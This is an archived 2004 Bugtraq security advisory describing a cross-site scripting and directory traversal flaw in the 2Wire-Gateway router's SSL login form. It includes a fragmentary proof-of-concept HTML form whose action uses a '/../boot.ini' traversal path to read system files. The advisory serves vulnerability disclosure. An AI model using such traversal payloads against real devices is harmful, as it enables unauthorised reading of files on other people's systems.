2Wire-Gateway Cross Site Scripting and Directory Transversal bug in SSL Form
From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/20/04
- Previous message: Oliver Karow: "WebTrends Reporting Center Path Disclosure vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <bugtraq@securityfocus.com> Date: Tue, 20 Jan 2004 23:14:03 +0200
#######################################################################
Application: 2Wire-Gateway/WebGateway
Vendor: http://www.2wire.com
Versions: All
Platforms: Windows
Bug: Cross Site Scripting and Directory traversal bug in SSL Form
Authentification
Risk: high
Exploitation: Remote with browser
Date: 25 Dec 2003
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
#######################################################################
1) Introduction
2) Bug
3) The Code
#######################################################################
===============
1) Introduction
===============
2Wire is a communication company that sells internet and network related
devices, such
as routers. 2Wire most common routers webserver is "2Wire-Gateway". It
includes a SSL
(Secure Sockets Layer) form authentification.
#######################################################################
======
2) Bug
======
The SSL (Secure Sockets Layer) form authentification has a XSS(Cross Site
Scripting)
that allows an attacker to change the forms action parameters. An attacker
is able to inject script
and urls into the forms action an by that Transverse Directories on the
server.
This allows him to see and download any file in the remote system knowing
the path.
How ever exploiting this vulnerabillity is very hard because the attacker
has to connect
to the target through the browser and accept the SSL connection , exploit is
very hard to reproduce.
#######################################################################
===========
3) The Code
===========
<form name="wralogin" method="get"
#######################################################################
action="http://
/../boot.ini">
<input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg==">
<center>
<input type="password" name="password" value="">
<input type="submit" alt="Submit" width="58" height="19" border="0"></td>
</form>
</body>
</html>
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."
Relevant Pages
... >Exploitation: Remote with browser ... >2) Bug ... >Invision Power Board is available under a yearly and lifetime purchase ...
(Bugtraq)
... > Exploitation: Remote with browser ...
(Bugtraq)
... You stated that these libraries were junk as though it ... we welcome bug reports. ... understanding of javascript or browser scripting who just happens to be ... I can't guarantee that any of us will write bug-free code on the first ...
(comp.lang.javascript)
... It takes only a tiny amount of creativity to extend ... The bug also helps start page, ... The slash character behavior Russ ... And what do you know - the exploitation of this bug also hides the page ...
(NT-Bugtraq)
... confusion and possible browser pitfall (incorrect or imperfect browser ... Tab-focusing areas is a filed bug for Safari. ... to the html 4 specification, ALSO work fine using a instead of area. ... in addition to the image map. ...
(comp.infosystems.www.authoring.html)
